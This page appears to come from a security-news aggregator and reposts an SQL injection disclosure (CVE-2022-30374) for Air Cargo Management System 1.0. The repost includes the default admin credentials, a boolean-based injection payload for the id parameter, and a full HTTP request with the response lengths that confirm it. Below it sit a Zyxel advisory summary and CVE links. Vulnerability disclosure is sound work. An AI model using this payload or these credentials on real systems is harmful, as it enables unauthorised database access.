Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30374: bug_report/SQLi-5.md at main · k0xx11/bug_report

Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/admin/?page=transactions/manage_transaction&id=.

CVE
#sql#vulnerability#windows#php#auth#firefox

Air Cargo Management System v1.0 by oretnom23 has SQL injection

Author: k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html

Vulnerability File: /acms/admin/?page=transactions/manage_transaction&id=

Vulnerability location: /acms/admin/?page=transactions/manage_transaction&id=,id

[+] Payload: /acms/admin/?page=transactions/manage_transaction&id=1%27%20and%20length(database())%20=7%20–+ // Leak place —> id

Current database name: acms_db,length is 7

GET /acms/admin/?page=transactions/manage_transaction&id=1%27%20and%20length(database())%20=7%20–+ HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=aaffvur9cmo069649rorqsbmeh Connection: close

When length (database ()) = 6, Content-Length: 37255

When length (database ()) = 7, Content-Length: 43289

Related news

CVE-2022-30374: bug_report/SQLi-5.md at main · k0xx11/bug_report

Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/admin/?page=transactions/manage_transaction&id=.

CVE-2022-30525: Zyxel security advisory for OS command injection vulnerability of firewalls

A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907